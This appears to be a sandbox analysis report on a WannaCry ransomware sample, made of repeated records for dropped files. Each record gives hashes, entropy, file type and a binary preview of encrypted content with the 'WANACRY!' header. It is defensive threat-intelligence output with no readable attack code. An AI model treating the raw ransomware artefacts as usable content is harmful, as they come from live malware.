                                                                                      Preview:WANACRY!....4.t...'W....u.~.4...B.`-..x..6`s...8.....x...&1.AT*....sr(...g.....}.y..gr.X...3z......3.C;.-5`n.F.cG...T.b...O....)!........{}..,...\q1T.x........w.4.....f..X\Y...Go......P.1.Y...S.Q..\.Z..`r.{9....yZ*H`.Q.......\g.i....36.Av.....j....q2..v..;...............m.Cb.X.q.S.R..}......1P..........5O...~.x..g...L>..:.Z~...>.....c+......L.=FQ..N-$.7....s..,.5P..; Y_'..24....4B......g..B ...>B./.@.}.].../.X..P| @)!NK......r..ETF3"..<+..w.....v..zO..,D.h..I...........^Q...>..Y.?...}BXI.=..0.......6....2j.gf....(..g.......*.....u].....f|.2..?..I_..Z.....o;.....q..x&.....v........U.xEj...E.....T1.]}.m@.~KQ...v.....^. .... P.F..U$*.".e#..._....T.>.7j....C.....9....:..A....Q~H......;Z.............F...o..0.3..!.0Z.-/.(a.[..JaE.|..8........Rlk.#.|..`..0.i"..N%......-......_.t..N.k.....O.d....'..[F..L..&..<.Z....nw...?.d.p.....0}..<.........{F9.v.8..F.....`.w.i.......D....^.x;.`NJS~..E.@f.L5....7.2.I....g.........Q8.K...........T.#.'P_
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861747732131273
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkGq0/M9UzN9Y1EXprknmSlgvSgFsau1jPxejBMgx2nBTxeZURvAU4k3A:bkrX9ON9JXprkmSlgvVfmxdX9Q
                                                                                      MD5:186AAFC0A8CC90BF51C1169DADC3C5E2
                                                                                      SHA1:D02C78A951D4A6CA0B9510D4144E8A1AEA33CE25
                                                                                      SHA-256:8B7BBB93E4E9D04398D5A1255F1B250F9CE0879F86EA0289E9D12AD465C297FC
                                                                                      SHA-512:D41B922D8FF85EC7B70DB1652430BDE3D0E4BCB5877A36D0BF223C34EAD4DC74710C2A873659BDCDE3B12F2FF8928CEAACE8E97D09D4B68BAA3F83C833DF0F07
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....4.t...'W....u.~.4...B.`-..x..6`s...8.....x...&1.AT*....sr(...g.....}.y..gr.X...3z......3.C;.-5`n.F.cG...T.b...O....)!........{}..,...\q1T.x........w.4.....f..X\Y...Go......P.1.Y...S.Q..\.Z..`r.{9....yZ*H`.Q.......\g.i....36.Av.....j....q2..v..;...............m.Cb.X.q.S.R..}......1P..........5O...~.x..g...L>..:.Z~...>.....c+......L.=FQ..N-$.7....s..,.5P..; Y_'..24....4B......g..B ...>B./.@.}.].../.X..P| @)!NK......r..ETF3"..<+..w.....v..zO..,D.h..I...........^Q...>..Y.?...}BXI.=..0.......6....2j.gf....(..g.......*.....u].....f|.2..?..I_..Z.....o;.....q..x&.....v........U.xEj...E.....T1.]}.m@.~KQ...v.....^. .... P.F..U$*.".e#..._....T.>.7j....C.....9....:..A....Q~H......;Z.............F...o..0.3..!.0Z.-/.(a.[..JaE.|..8........Rlk.#.|..`..0.i"..N%......-......_.t..N.k.....O.d....'..[F..L..&..<.Z....nw...?.d.p.....0}..<.........{F9.v.8..F.....`.w.i.......D....^.x;.`NJS~..E.@f.L5....7.2.I....g.........Q8.K...........T.#.'P_
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8118608335094555
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FEHPdlqYcRRUC41HL3JoYHsR7qy71ajshM4HveBwp1CuV4fw:WHPdlqYcfUTtTqp7qyBayMDBw74fw
                                                                                      MD5:E8AE12E5E16CBE5BEAD7BD994158B5A7
                                                                                      SHA1:6609FF1DDBF736DD6C97A5FC675A61D46CDBA998
                                                                                      SHA-256:A3A5FA8F390BA18224F32422FBD10D46D4B5DE8B866219EC577B65B6C2AA26F1
                                                                                      SHA-512:E209CB25FFA18D465648DE643EFAAA1F3A0C06B2A0EF122D59AAC0C24F9A716AB76877C4CE9832E526BF8CDC41F8EB9E2451BF95FC1397FA86707852C197F987
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:.aG...<..N`.(t.._.8.k..sjT...-\......y*...k.{.-.q`......V;.8...7$@.;..8..5<..8..Fs.....Q.E...OG.....p...;R...5...-..eF:.....%!0..D7..........>...L*0..*......@u.[.b./I.]p..oQ]..[......v+=..<.A....2...u..(B(.M..};.o.~.z.>..DR;.0q.5...S..LMV.....YU......-g@....~.h......-X c..:....6e_.....eI.0X..].r.&.l}1gL..Kf-.>>...,..R.hU.DM.4B.....+.{.H...ob...L.m...5l.W.z.E..'..cpt../? f.."k.)fS.)..l;.!7...=J..<o}.d.......T..`.Y.....>[...#...X.5(....q.m...u.yc....K.N...V....d....W>n..r..$.+)..HI...Umot....y.r.V...R......9.9(.....e..oi3q.DU....'z1/ ;j.|I|....^.%..,=...7j.L.Ir.NG......-.:U.5Lv. .l.+.J..3...;..FH.`.......2..hg.u..2.....|.:]$.....;..w.[`k..S..=q].!l~.d&.6.~P_v.U....4..M......G.].].]S;m..#.%_b@...)X....WK.(....}Uj..w..n.9...U...0J!.s>.F..G...!.[](...wC.U...i..O.a.{.5{....N..s.t....&.t..q..3F....t.e~c.[.6.n*.K#..E..!.W"...>.wh..u:sO..P.Q_...V.........}.+......f?.?........".h2..l....t }.9....#...)3..5.......d...o........n"n....34..q.kZ.Qwp....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856073535827062
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvrN3L+MutM4pXR98mZfflupJZqg/F/yA6Sc87l1X4ljmQCz1aajCFsqYbMjMn:bkvalT98gfg/F764liluRjWpY+M
                                                                                      MD5:43002770BC707107F9C639E70DD51CB7
                                                                                      SHA1:B3324C09395D318F56CE8FDCAAACD3BD1C47D560
                                                                                      SHA-256:F98A5A1AC2DB73BF766EA1285038DB221A411BB068019B5DBFDF09862A8658E1
                                                                                      SHA-512:50A6CB832521E1174D9DB1FFA3195CDEB2442D96D5531AEE497B2463227C6B2966CBA3DD65694364D5E73F05C76D3018DDD918DCA160F1A74890E51FF8B5A011
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....m!w.]I.B..7...*....+.K....iq.A".z.=...vm...f...d..O..R...dg.t..`.D.E...E+.0.:.b.,..B.....g.%I6.mY..$.+o.vd...V.y{.Vy.&...#...H].3...Q.z.4..3..Q.R@......Y..\.:?.e7G.S9.........l.=.0..Z./..)P.>P....J!...'..y.....W.O...L.R...b..z~.....m]wB....M...M............C..c[.f.).}..@..)[.x....m....+*.A..`jt..#.....Q...#..>..?.. .......[....A.x....?E.lu......c..^...r.a..~.u...m.v.TC.z0Vqc.../.&@xm.d:N2\.q...........p..ZoHP..'jM..X..j4(....;.....d.....=.a._4..[.hpa.\F...8.N.v3I.\...r!..x.~:.........XY.})r.F*mL. ....k..oJ..1..s.....s..l.E...D.Z.?..G%u.....T ].-;.q.;m...{t.d.}!|k.<.....~#..Lv.U.w.=w.M..H5.9J.h#.~Ya.....y...\..Tv.z...^."".Ij.I....=...._..H..D...J.Tx. ..Hv'a............y..eX%woR!........&....~...*7.(n..)$g..u..^i.yo...je.BM.y..`..!)....gn...X...1\8.....X..g.D7.......i..$..8./.A..=]&....%..rEh.o..L.G.^0...,.Q.3..2<..%......u...ZngA..vd..j..D...C~:5W.J.......$..C.I.(.>06.....)..e.Uw..Mj#.<:.8.~..:..|.KR.r...1..wK..o.....B.Q.m.l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856073535827062
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvrN3L+MutM4pXR98mZfflupJZqg/F/yA6Sc87l1X4ljmQCz1aajCFsqYbMjMn:bkvalT98gfg/F764liluRjWpY+M
                                                                                      MD5:43002770BC707107F9C639E70DD51CB7
                                                                                      SHA1:B3324C09395D318F56CE8FDCAAACD3BD1C47D560
                                                                                      SHA-256:F98A5A1AC2DB73BF766EA1285038DB221A411BB068019B5DBFDF09862A8658E1
                                                                                      SHA-512:50A6CB832521E1174D9DB1FFA3195CDEB2442D96D5531AEE497B2463227C6B2966CBA3DD65694364D5E73F05C76D3018DDD918DCA160F1A74890E51FF8B5A011
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....m!w.]I.B..7...*....+.K....iq.A".z.=...vm...f...d..O..R...dg.t..`.D.E...E+.0.:.b.,..B.....g.%I6.mY..$.+o.vd...V.y{.Vy.&...#...H].3...Q.z.4..3..Q.R@......Y..\.:?.e7G.S9.........l.=.0..Z./..)P.>P....J!...'..y.....W.O...L.R...b..z~.....m]wB....M...M............C..c[.f.).}..@..)[.x....m....+*.A..`jt..#.....Q...#..>..?.. .......[....A.x....?E.lu......c..^...r.a..~.u...m.v.TC.z0Vqc.../.&@xm.d:N2\.q...........p..ZoHP..'jM..X..j4(....;.....d.....=.a._4..[.hpa.\F...8.N.v3I.\...r!..x.~:.........XY.})r.F*mL. ....k..oJ..1..s.....s..l.E...D.Z.?..G%u.....T ].-;.q.;m...{t.d.}!|k.<.....~#..Lv.U.w.=w.M..H5.9J.h#.~Ya.....y...\..Tv.z...^."".Ij.I....=...._..H..D...J.Tx. ..Hv'a............y..eX%woR!........&....~...*7.(n..)$g..u..^i.yo...je.BM.y..`..!)....gn...X...1\8.....X..g.D7.......i..$..8./.A..=]&....%..rEh.o..L.G.^0...,.Q.3..2<..%......u...ZngA..vd..j..D...C~:5W.J.......$..C.I.(.>06.....)..e.Uw..Mj#.<:.8.~..:..|.KR.r...1..wK..o.....B.Q.m.l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.810802167766141
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:1fRmbHCcW1HxM7uKCKBKFv7s/nQyMJl+DiOdGFJ5gATP3PJZ:ibHmHKyKCaUScsdWP3Pn
                                                                                      MD5:4B1403C31F1AABB2DBCF0ECAAEC1E5D5
                                                                                      SHA1:2BF302E88668EB81059886D88248972DD8C63BDC
                                                                                      SHA-256:0A1C8C936CDA10FB15F8E4EC00EE026602960725DE05E525340FE4D7641283A3
                                                                                      SHA-512:7AF65042E78313ECD913A0F7F5ECE2CF36992C59D2422B72ECE771C475B23358EE8C4F79CCFF6D9C4765E8E9F00141F31A0D29A1D92A882192FF4E75ED1BC694
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.>d..C/.....@ zFI.dQ......u..o.Tj..!..{.@..........+. [..E....... .........T.....7.tp...h*..G.T....]...dne....Z.'...f.6b\..q.9.(..AO3~..v......nl..Np.f...'..H..($.WM..0.b.=..T. *..,._.&.B|w..d..7.......q...D.../.!.A.L...,...`9....zl..V.0....;eE....?=#v.H..4....U.Cd.T.\V`..9.@..Nd.'.R..I..$.ec.5?..{.rT.....$+.r!.l..z......K%..y..\..W...Z...s0......\C.t...V.1..yW.a.........Tn]..A}A5+/a.2.K......2...`Gj...........l...@Q.x5..j7.(..6#.".j.r.[.$.E.2.-.Q,..Vs..3..#.|..U..m+.j...Xo)MwN.Br"\3.H.~..x.7(lEk..."h~H...4.mo....2.L.....u3.&...?.....n.. .##.(.J^.j*.:.0.gI.'...(}g@(^..!}u.......A.N...>.!.....%-..*+.........R.. .Mq...zCVlMI...*ss..r..'...OdM.Yip..BL..A.\...V.T..n=.}-...k.l.....%..W....;T.d.vz......"...`.7..P.......&.^Y.ik.D.../}i..Ni..X......._...p.-......cr..R..........+4.O...TEm....bY....[..e._I.. .5F..r....Ia......C.^.s..L1..\.....z..e..9..y.x-."...(.....s..).z/~......0.{..A..\....`=.=.....[o..d..%..(n|....{...z.....V......V=.AQ.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83939710847616
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3l+JB+3nMozqDtQ9G+cfsQY4UgnHhJoERzpIiXyL1Ws03RTBk9fNJ:bkV6FozqDKig4rHTo6mLQb3cLJ
                                                                                      MD5:EC2A3258E00DF5BFB5CD4DD77E091C8F
                                                                                      SHA1:6C21E0EE85FDFB240F78A6FE9B7310B298BD46D5
                                                                                      SHA-256:01666CF158D803D3862E2B9C9F11DBC1E2A0A41842916FAABA787563AAE62296
                                                                                      SHA-512:4F587743EB453E69E8D0E83167FF96C1CF1AAB99981CC1EECFC73A745466F097E4BE4EC5F8A35DFE044B22862520512D562A67226987E1F51141035EA017758A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w..R..]\..h!...l?(.....C.....]@_{...]>.i.y...'.C......d+..Ui....:.k..D.........7d.].h.P%..L..w...|_.?...,g<.A]%...&..C...3.^S?XM.r..*..F.y)..N.... ........dz...V7s.D+....../..r.-...........L........Gy....2....nP......"m./.#....1)..>..K............Gf|.R.2.F1.D.t..2ur.}..g......+E>....YU.D..!.}.].z.U[O.?...o.(..4.Mv."...~*i...JdV....w.%....)!..Wn. +...(4..{...!k.#...w.......I..68......eW .....Z....4.A....g........Z.[.n.....KL.4Y(C..\..~=.#....h.Ks.G..w...O.....!. ._.....^...,.T...`.....H.)]... s..|v.x.....>k/C...1^h.P(..l;..HTg...DH.%..p..g.RNl.^..3{......,...'...$L...W..(..y.e.Q....b....r?.;..G..].....)...O)5.H..&..;.....d...._..~.v..3....w$..$..B.i.D..k...<$.=..r......l.@..>....o'.T.K.!.7.V..(.;.j.%.G.....2...x*.D..~.<p$.b{.c`1dyN...l...sf>bP...+n..F69z,.'.....D...3.sl.:.':.3..j`\OU.'{...y.......>.>..?.<.'..7.N..T...q#.\.A.g........KM.O.......-C..k.r...u..s..j>.j..R._=w`e..#.......<H....O..z.^.Q#.C.....V.a....ls.>)7.z....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83939710847616
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk3l+JB+3nMozqDtQ9G+cfsQY4UgnHhJoERzpIiXyL1Ws03RTBk9fNJ:bkV6FozqDKig4rHTo6mLQb3cLJ
                                                                                      MD5:EC2A3258E00DF5BFB5CD4DD77E091C8F
                                                                                      SHA1:6C21E0EE85FDFB240F78A6FE9B7310B298BD46D5
                                                                                      SHA-256:01666CF158D803D3862E2B9C9F11DBC1E2A0A41842916FAABA787563AAE62296
                                                                                      SHA-512:4F587743EB453E69E8D0E83167FF96C1CF1AAB99981CC1EECFC73A745466F097E4BE4EC5F8A35DFE044B22862520512D562A67226987E1F51141035EA017758A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w..R..]\..h!...l?(.....C.....]@_{...]>.i.y...'.C......d+..Ui....:.k..D.........7d.].h.P%..L..w...|_.?...,g<.A]%...&..C...3.^S?XM.r..*..F.y)..N.... ........dz...V7s.D+....../..r.-...........L........Gy....2....nP......"m./.#....1)..>..K............Gf|.R.2.F1.D.t..2ur.}..g......+E>....YU.D..!.}.].z.U[O.?...o.(..4.Mv."...~*i...JdV....w.%....)!..Wn. +...(4..{...!k.#...w.......I..68......eW .....Z....4.A....g........Z.[.n.....KL.4Y(C..\..~=.#....h.Ks.G..w...O.....!. ._.....^...,.T...`.....H.)]... s..|v.x.....>k/C...1^h.P(..l;..HTg...DH.%..p..g.RNl.^..3{......,...'...$L...W..(..y.e.Q....b....r?.;..G..].....)...O)5.H..&..;.....d...._..~.v..3....w$..$..B.i.D..k...<$.=..r......l.@..>....o'.T.K.!.7.V..(.;.j.%.G.....2...x*.D..~.<p$.b{.c`1dyN...l...sf>bP...+n..F69z,.'.....D...3.sl.:.':.3..j`\OU.'{...y.......>.>..?.<.'..7.N..T...q#.\.A.g........KM.O.......-C..k.r...u..s..j>.j..R._=w`e..#.......<H....O..z.^.Q#.C.....V.a....ls.>)7.z....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8415587234469175
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Q6PqXdeqpBJkm6zse1kAkgvA8YUel/AfRA+XAL8XRj1:odeuczdqLqA8Q/6u+XU8X/
                                                                                      MD5:37D72C8AABBD20FBB700BBC64BC9E073
                                                                                      SHA1:17CB89B7A20E014FCAF00B76C00318AF3B8494A8
                                                                                      SHA-256:DB8BD1C2C189EFF93EE80CBD6658484C84ED934CDEB674C668D9D47AF3CC1926
                                                                                      SHA-512:4C6BD5DF3E9871A0078602F4DB39285F20A076E69E2C0491310DE523AA5A05CC0D0AB0D5E578E278F55C9980FA091739EF603D2C0D2C11B8F27783610DBDE3FA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:w....O).>.9.._....8.fp..*KG`^..,b2..Bu@M@.p...:.W.........B6q.T.......7...mp..<...7........pQ$&.R....*.....][.];.3k....D..$.jj.Z]..d._.D98..$.X.5..F.QQ....R.]...k{...Je0..[..t:%._...N........}.......z.Ocl&..c..8.#..j....L.;..... ..xRy....x~.tEc.E...[......H..m5....Z.wA._.....-.k.fjO....~m........\.~......4$.b....7....4.Tp......O...x..$-U']}... ...........)_......4..z..]p..g.K.g[.."...JI3.......G..G.jS.}NgF.=........|.`....ao\.9S..er...adJ.l...V..x.d.c.3 HD.....:...-h.......'....'..i7..\.....9D..H..`..5..f....B...D..........c....$..[A..}...\...6.^v..Sr.?P.$).'....<0U.?.;....P.. ..Q^.7L1...E.<.....*...D.@=I...F..I(K.'I<..l.x..V.K.{..aOj\\...Ma....L.P....y.._..7.X3.l.*aR.CD.H.8Q&}Q.?..F#..V..a..U...vd:JW..WH,.O?.0}.%Y;......V.x.s..x.@..s..ZK.xs1d!.~.t.e.tvi..{...."..t..x.|z9....y.......O..V2..HYn.y.._p....Lw]..bp..x ....%T....p....[.^.6Cr........E..b..U.. P...,...c.....h;Fh..v..u.EF..G../9I>.m.fb..C..0b...H..yqV...-S.....b).l.D.'JI....r..;...s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.85334935266591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk0E4hH2O1Yq1AIhm17JuNGOhFq//Y0BL2vewjkOthlbmNS4WP9prFo:bk0hWO1Y8hmNvZ1ETjvpUWP9Ne
                                                                                      MD5:7130B94593E30E0BB88F80F522DD086B
                                                                                      SHA1:63C225708967F6AFC1F55A7D68A03637DCAC465C
                                                                                      SHA-256:0C142FB52058E5407912295BFEFB8F9687C3BA6E72258BDFE4CE473E0858D28E
                                                                                      SHA-512:3EEEC1448FDA1C6EB563F49E0CA9B8EA2C2D9981142E43D3D02F8C6407EE4F9DA0283AC030D5C257CFCE68C08E6DDDBF66C45A18068BE65803CD0B7E59AF1FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....2.Y.K):.Y.|.....".Mh...H%~.h.'...h.?$M....l.... .hJ.a.z..p`9p].l...-.36G.....p6.q.....h..2./..0+....I1.CH...........w*..I.7.D.$L....J<O......J..\..............j,.M..]..8c..:..S...D..Ig..T.......L..24?q .t[..).iq.)!.....)..mJ.w....`.l..c.Y..../............O..+9.f,.T.......V..A.&...{..jy...V..B.}.|:...r .)..9.S.:4;y.B.|z......u.J.....i(....&..#. .r.s.....{..P.+..R....Z.VK......./.R.....v...7...*...t.W1..X#... .q.M..z..Bl~.g.W.....-.G.G*...9....3..1..!.J].p...E....Gq....T.T..<.A,..m.:...s+-)V~...{8Wp.....f.iSvj.xi...:D.....a.~7..@.&WY...).6R.(..L_..Uj".`......!..5.#N+....4c. H%..:g..l_..@..~...`>.....4.G)%!......,#7S:....Y..{.k...G8.w......>..l3...V. ....ud.N?......n....F..9..j,..r.:..e&d....6L.s1...:.!.H.$.;HO3..V...B9.v...,.<V..]A../...... ..4..QS.,2..#.&....GN.Rq.:....1~.&{n.^w..z6...L.Pu..4v...2........%$..Zpd.Z.Q....|V....W....D.nt..D ...e.=..j...j...g....<7.6.....yIH.Y.!l.E@,.3.;..-..<#(./...&d...P...Od.......b ....d ....^
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.85334935266591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk0E4hH2O1Yq1AIhm17JuNGOhFq//Y0BL2vewjkOthlbmNS4WP9prFo:bk0hWO1Y8hmNvZ1ETjvpUWP9Ne
                                                                                      MD5:7130B94593E30E0BB88F80F522DD086B
                                                                                      SHA1:63C225708967F6AFC1F55A7D68A03637DCAC465C
                                                                                      SHA-256:0C142FB52058E5407912295BFEFB8F9687C3BA6E72258BDFE4CE473E0858D28E
                                                                                      SHA-512:3EEEC1448FDA1C6EB563F49E0CA9B8EA2C2D9981142E43D3D02F8C6407EE4F9DA0283AC030D5C257CFCE68C08E6DDDBF66C45A18068BE65803CD0B7E59AF1FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....2.Y.K):.Y.|.....".Mh...H%~.h.'...h.?$M....l.... .hJ.a.z..p`9p].l...-.36G.....p6.q.....h..2./..0+....I1.CH...........w*..I.7.D.$L....J<O......J..\..............j,.M..]..8c..:..S...D..Ig..T.......L..24?q .t[..).iq.)!.....)..mJ.w....`.l..c.Y..../............O..+9.f,.T.......V..A.&...{..jy...V..B.}.|:...r .)..9.S.:4;y.B.|z......u.J.....i(....&..#. .r.s.....{..P.+..R....Z.VK......./.R.....v...7...*...t.W1..X#... .q.M..z..Bl~.g.W.....-.G.G*...9....3..1..!.J].p...E....Gq....T.T..<.A,..m.:...s+-)V~...{8Wp.....f.iSvj.xi...:D.....a.~7..@.&WY...).6R.(..L_..Uj".`......!..5.#N+....4c. H%..:g..l_..@..~...`>.....4.G)%!......,#7S:....Y..{.k...G8.w......>..l3...V. ....ud.N?......n....F..9..j,..r.:..e&d....6L.s1...:.!.H.$.;HO3..V...B9.v...,.<V..]A../...... ..4..QS.,2..#.&....GN.Rq.:....1~.&{n.^w..z6...L.Pu..4v...2........%$..Zpd.Z.Q....|V....W....D.nt..D ...e.=..j...j...g....<7.6.....yIH.Y.!l.E@,.3.;..-..<#(./...&d...P...Od.......b ....d ....^
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.786712490368082
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CZjUIRPsuBPILaNL/E0cpsIJkdCGUkFCBoWspdKmkij:CZjPPsuhILYDMpsZcGeGdHkij
                                                                                      MD5:3F7352566A99E3C3E0F7ED91807AA1E2
                                                                                      SHA1:34F9747E29C062E513C0D054003BEA4A1EB4AB3C
                                                                                      SHA-256:70670470B49B5B0520F2F4D8EF1F274975207AFE15AB07D910DC3728A429BACC
                                                                                      SHA-512:5131487115B376661138487316DCB60522F4F88B06D2215EDAB543491E2EC196D08BED9EE91DB55A9FAD280A63BA3F3DB78945841E1448FE09B92AF171E3BA6C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:se..O=.:...P.Y.....<..Zy...k..l....`Pq.W=.~K..C....9.....t...V[.L.=o.4.....3".<g.`..w.^..).6f.!*..x4..a$.v}!...29i..6./O.`.c.U.e.i.U.8....qJ.3..@Q....B4;u.q.Qx..B..........8..o...g3yf..t.8y..g6:.....Z.......d.....W#eb.L&..5.2.....]....@....V.!.#v=`...9...1._....R..`.ZY}.A[pz.....d./@.....D..W|1...$^+c.$6}<3J>rI.M..T.Y.....V=.|.. x(e..c.:.!....'O..wM.o6..f>ol..Z....x{.....i...x....NJhd.......Y. ~.1.....X.{...p0....8}.9sN..m..&.....,...3".N..Ux.....J..i.[gH....#.;?.....Mj.{..?...]x.....^f.......o.Y....t.\.8pP.u......=..w<T$p....{g..&.!..[i..k..U..&..;.M.SH....zM.,?z..I+...bz...e.sx0...a...U.......n..J5.^..{..E...G..8[....3....a..k.. l.9UL..9r..W..-.d.m..3o.I-Bom..].R..9Y..f...3:.h.Z..6-0L.....K....ul..{O...(,]..^h.6....]..6o~8...W.(X.......3.@.r.{...`G\.&.^..6H].0...V$Z..u!..\s.L..f..=.N..... ......%U...h...ot...0...l...l~..~H........2..'...&L.....J.<.~/(E.....3.P..ct6..l.b.6..+.t..xNd.. Xj..5T..yP.*..I.~.;~....-...1.h...Q.0.2..B.q.Z.Xm.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841138820999248
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkI7V8jzaoMMtP/f1HrP5RPnORjL/s+9vk9S+83u1M8jhwK57IRw2coi:bkIB8jzMWP/tFdnORjLk+tk9SLshR1Ym
                                                                                      MD5:3A8D802C069A3150B49EE3ED406C2E02
                                                                                      SHA1:F9E22CC34F0D6336918D1B4D6A7C675278E03F3C
                                                                                      SHA-256:DF5852A80754689B3EFD9DB79240A73B81DAE3608AF6BA6A99C56989CA8ABFEF
                                                                                      SHA-512:71CDAA68EBDA0E641D78F33710DF6BAB33AFBC0F60949A328FDCB9BAB551BA4B165E3226341E49B78B0A64BD5147806457103A6B59F5A4094780BA830EE6EF7E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........{..0]..s+F...5...t^D...-..D..$.I.%M...{g...,...7Zr..3.^E.9.U....n...(..../.w.;.P.[.c!........]..3..y.2.Fe&..`...i....8 .?........z.\.StK....DGC.//..~.......|XHC.q;.#Km.}.y..;....i....c.^].....*A"G..-E.a*.p.....@c..S....tJ.fjN[.I..5*1..k.<....................a..Q....g....d.....v..)|2.U._....P.QJ..o@Kv...Yr...R...R.......2..3;.....,..Hq..aN.d1...J.j..p..SRs...S.5.1L..w.X...1v.+.......!%.W.....LqH{.."p.[..$...m.t.w..N.ys.......p..3.0.t.@.>.K.....,..0.3..m..a....y.59.J.<|...rP..+Q"Ee..QL1J..}.|>.[..p...$.cY.m\x.h...>Y.hd......ChY..1...&.X ,.9OD.......:.6.B..0q...C........... ...B.,.-....I.yF.s...y.\..[d.o.........E8S6\wg.R.....kQ.c.].i..C.$...r....r..Ly...&.../.....R...N....#2..l.u..m.>9...Y..N..m(:K-3._..p.......K3.....[r.y.7H.=.w..i0b.: ...B..R.L......>.).{...E.".....v....{.h.....5.....[Z..Sg..+Q...Z......DA.,..B7...y...`:J..hzl..ff.;.T..i4O..i......q.z...^M..w....qKye.H%..].2..QO.#....Nu.. ....i....f...B.*......,.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841138820999248
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkI7V8jzaoMMtP/f1HrP5RPnORjL/s+9vk9S+83u1M8jhwK57IRw2coi:bkIB8jzMWP/tFdnORjLk+tk9SLshR1Ym
                                                                                      MD5:3A8D802C069A3150B49EE3ED406C2E02
                                                                                      SHA1:F9E22CC34F0D6336918D1B4D6A7C675278E03F3C
                                                                                      SHA-256:DF5852A80754689B3EFD9DB79240A73B81DAE3608AF6BA6A99C56989CA8ABFEF
